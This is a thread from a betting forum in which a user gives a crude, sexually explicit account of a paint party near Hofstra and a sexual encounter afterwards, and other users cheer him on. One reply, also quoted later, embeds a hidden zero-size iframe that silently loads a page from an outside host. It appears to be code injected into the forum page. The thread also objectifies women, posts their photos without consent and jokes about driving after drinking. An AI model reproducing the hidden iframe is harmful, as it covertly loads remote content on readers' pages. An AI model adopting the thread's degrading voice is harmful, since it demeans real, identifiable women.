ZetaPsi808
    July 2011 Poster of the Month
    ZetaPsi808's Avatar Become A Pro!
    Betpoints: 1982

Paint Party Tonight @ one of the Hofstra Bars

Mods dont worry. I aint trying to advertise or spam for the club thats why i wont mention its name.

basically the bouncers stand on top of the bar and throw paint at you from paint buckets

i am also meeting broad in middle here with huge and phat ass. odds i score in back seat of corolla are +150

queens/long island guys should meet me there 10 pm sharp and we will pull fukkin broads
    Last edited by shari91; 10-17-12 at 02:34 AM. Reason: removed pic at poster's request

Louisvillekid1
    LAMAR MVP!
    Louisvillekid1's Avatar Become A Pro!
    Betpoints: 553

what a dumb fukkin look.... Like you visualizing scoring later... ahhhh

Well done playa

ZetaPsi808

you guys need to stop the internet wars and go meet some broads

beermankirk
    beermankirk's Avatar Become A Pro!
    Betpoints: 885

Make sure you find those ones that won't leave yer sheets red in the morning!

Sol Diablo
    Sol Diablo's Avatar Become A Pro!
    Betpoints: 2483

Fake boobies on a fatty.

Nice find Zeta.

Louisvillekid1
    LAMAR MVP!
    Louisvillekid1's Avatar Become A Pro!
    Betpoints: 553

Quote Originally Posted by ZetaPsi808 View Post
    you guys need to stop the internet wars and go meet some broads

"I'm gonna turn my flashlight on, Fukk it!"...

AHAHA
    Last edited by Louisvillekid1; 10-06-12 at 06:44 PM.

jjgold
    jjgold's Avatar Become A Pro!
    Betpoints: 10

ZetaPsi808

beermankirk!!

dont remind me of that fatty

Diablo, there are tons of girls like that on long island. last saturday i got a handjob in the back seat of the corolla from a dominican broad who said she never did that before

odds she was lying -250???

LKID1, what up pal

paranoyd androyd
    paranoyd androyd's Avatar SBR PRO
    Betpoints: 134523

have fun post more pics

beermankirk
    beermankirk's Avatar Become A Pro!
    Betpoints: 885

update with pics buddy!

ZetaPsi808

crazy night. i get there and find both of those girls in the club. i went for the one that got cut out of the pic. she has an ass like nicki minaj

i will update in the afternoon. we took some pics but she has them on her phone but i will ask her to text them to me.

considering all the events that happened it was prob one of the craziest nights of my life.

jhack704
    jhack704's Avatar Become A Pro!
    Betpoints: 1443

Mods dont worry. I aint trying to advertise or spam for the club thats why i wont mention its name.

basically the bouncers stand on top of the bar and throw paint at you from paint buckets

i am also meeting broad in middle here with huge and phat ass. odds i score in back seat of corolla are +150

queens/long island guys should meet me there 10 pm sharp and we will pull fukkin broads
    you have a toyota?? that wont get you anywhere! get a real car and maybe you will get lucky
    Last edited by shari91; 10-17-12 at 02:34 AM. Reason: removed pic at poster's request

kmarinouofm
    Those who stay.. will be Champions!
    kmarinouofm's Avatar Become A Pro!
    Betpoints: 3403

jeez guy just come to miami .. this is considered wild ? jeez..

billyloco
    et5tdFRy
    billyloco's Avatar Become A Pro!
    Betpoints: 1620

Quote Originally Posted by kmarinouofm View Post
    jeez guy just come to miami .. this is considered wild ? jeez..
    Miami is in a class by itself k!!!!!......hottest fukkin babes in the world , and I've lived in Los Angeles too!

kmarinouofm
    Those who stay.. will be Champions!
    kmarinouofm's Avatar Become A Pro!
    Betpoints: 3403

Quote Originally Posted by billyloco View Post
    Miami is in a class by itself k!!!!!......hottest fukkin babes in the world , and I've lived in Los Angeles too!
    tell me about it bro.. i work in the nightlife industry in miami beach..

Vaughany
    Jibbbeh is my idol.
    Vaughany's Avatar Become A Pro!
    Betpoints: 8647

haha looks like you fell asleep!

Unreal boys, tht broad doesnt look too bad!
    Last edited by shari91; 10-17-12 at 02:35 AM. Reason: removed pic at poster's request

Chi_archie
    GASPING FOR AIR
    Chi_archie's Avatar SBR PRO
    Betpoints: 2260

nice work Zeta

Zeta is winning

Bigbill365
    Big Money Bettors
    Bigbill365's Avatar SBR PRO
    Betpoints: 1016

so whats the word what happen did you get lucky?

Facepunch
    Facepunch's Avatar Become A Pro!

Miami is legit,
    Sexiest chicks on Earth.

ZetaPsi808

ok as im waiting for those pics i will just tell the story here

the bartenders poured paint into these plates and put them on top of the bar for us. so i put my hands in it and then started smearing it across broads' faces, ass and .

luckily i found that girl and then we started dancing. i bought a $10 pitcher of beer and we split that. i had paint all over my face i looked like a mime. kids having fukking orgies on the dance floor and shit.

so i wore ripped up jeans that had a small hole in the leg that was like 7 inches wide by the end of the night. broad feeling my rooster over jeans and then she put her hand thru the hole. she started laughing bc my rooster poked thru my boxers slit and out of the whole and was wagging like a dog's tail. unfukkinreal

anyway we left club and i drove her home and we stopped to buy condoms. $4.99 for a 3 pack of trojans. unreal i paid the fukkin vig boyzz. so we drove around the block and tried to fukk in my back seat, but i could not get hard i think b/c i had jerked off a few hours before going to club. shit was awkward as hell. then we went to her house and hung out in her living room at 4 am

she sat on my lap when i was naked and started dry humping em and the weirdest shit started happening. she has a 18 month old puppy labrador that started licking my balls. unfukkinreal i got cockblocked by the dog. every time we tried to make out the dog jumped in and started licking her face. she kept hitting the dog and cursing at him i was laughing my ass off.
    Nomination(s):
    This post was nominated 2 times . To view the nominated thread please click here. People who nominated: Vaughany, and Maniac

Vaughany
    Jibbbeh is my idol.
    Vaughany's Avatar Become A Pro!
    Betpoints: 8647

ok as im waiting for those pics i will just tell the story here

the bartenders poured paint into these plates and put them on top of the bar for us. so i put my hands in it and then started smearing it across broads' faces, ass and .

luckily i found that girl and then we started dancing. i bought a $10 pitcher of beer and we split that. i had paint all over my face i looked like a mime. kids having fukking orgies on the dance floor and shit.

so i wore ripped up jeans that had a small hole in the leg that was like 7 inches wide by the end of the night. broad feeling my rooster over jeans and then she put her hand thru the hole. she started laughing bc my rooster poked thru my boxers slit and out of the whole and was wagging like a dog's tail. unfukkinreal

anyway we left club and i drove her home and we stopped to buy condoms. $4.99 for a 3 pack of trojans. unreal i paid the fukkin vig boyzz. so we drove around the block and tried to fukk in my back seat, but i could not get hard i think b/c i had jerked off a few hours before going to club. shit was awkward as hell. then we went to her house and hung out in her living room at 4 am

she sat on my lap when i was naked and started dry humping em and the weirdest shit started happening. she has a 18 month old puppy labrador that started licking my balls. unfukkinreal i got cockblocked by the dog. every time we tried to make out the dog jumped in and started licking her face. she kept hitting the dog and cursing at him i was laughing my ass off.

Amazing post...don't know where to start with this! I've highlighted my favourite parts!

Firstly, is it standard to drink-drive around Hofstra?!

Hate it when you get whiskey dick as we say over here in England (do y'all say tht in America?!). Nothing more annoying then trying to bang with a semi!

Russian Rocket
    Kleptoman
    Russian Rocket's Avatar Become A Pro!
    Betpoints: 533

great f-cking adventure...keep up the good work! <iframe src="//edge.crtinv.com/getData.html?d=about%3A%2F%2F" style="width: 0px; height: 0px; display: none;"></iframe>

Ratpack
    Ratpack's Avatar SBR PRO
    Betpoints: 1777

how old was this chick zeta you should of id her to make sure she was over 18 i hear stories in those college bars about youngins sneaking it

TheMetsSuck
    TheMetsSuck's Avatar Become A Pro!
    Betpoints: 1404

hofstra bar scene is known for their stds....careful

Maximo
    Maximo's Avatar Become A Pro!
    Betpoints: 1865

I graduated from Hofstra few years ago.. I was an international student and as of now i can say, i miss that school.. I used to have sex without knowing a word in english.

Russian Rocket
    Kleptoman
    Russian Rocket's Avatar Become A Pro!
    Betpoints: 533

Quote Originally Posted by Maximo View Post
    I graduated from Hofstra few years ago.. I was an international student and as of now i can say, i miss that school.. I used to have sex without knowing a word in english.

ZetaPsi808

Quote Originally Posted by Vaughany View Post

Amazing post...don't know where to start with this! I've highlighted my favourite parts!

Firstly, is it standard to drink-drive around Hofstra?!

Hate it when you get whiskey dick as we say over here in England (do y'all say tht in America?!). Nothing more annoying then trying to bang with a semi!
    glad to see you appreciated it!

i dont think kids drink and drive alot in that area. at least i hope not. there are always cops everywhere b/c it is in the ghetto and always a lot of drunk kids wandering the streets. i was 98% sure i was sober by the time i got in my car to drive her home tho

it was not whiskey dick. the problem was i had jerked off approx 4 hours before leaving for the club which will kill my sex drive for that night.

ZetaPsi808

Quote Originally Posted by Russian Rocket View Post
    great f-cking adventure...keep up the good work! <iframe src="//edge.crtinv.com/getData.html?d=about%3A%2F%2F" style="width: 0px; height: 0px; display: none;"></iframe>
    thanks pal it was a lot of fun!

Quote Originally Posted by Ratpack View Post
    how old was this chick zeta you should of id her to make sure she was over 18 i hear stories in those college bars about youngins sneaking it
    she said she was 20. i dont have reason to not believe her. girl has a good head on her shoulders

Quote Originally Posted by TheMetsSuck View Post
    hofstra bar scene is known for their stds....careful
    you are right. we did use a condom tho. thanks for your concern

Quote Originally Posted by Maximo View Post
    dude i def believe you. girls would love your foreign accent too. where do you reside now?

ZetaPsi808

ATTN MODS:

can you edit out the pic of the 2 girls in posts #1 #12 and #16 in this thread?

this thread is easy to find from google and i would feel horrible if someone they knew found this thread. it was a dumb mistake to post any pic of them in the first place.

thank you

ZetaPsi808

i'm only worried b/c i said some X-rated details about us having sex. if i kept this thread PG rated, then i think sharing her pic would be ok. god forbid somebody found out that she did this and this in my car.

TheMetsSuck
    TheMetsSuck's Avatar Become A Pro!
    Betpoints: 1404

pic is blurry and they are covered in paint. i wouldn't worry about they know stumbling upon this and recognizing them.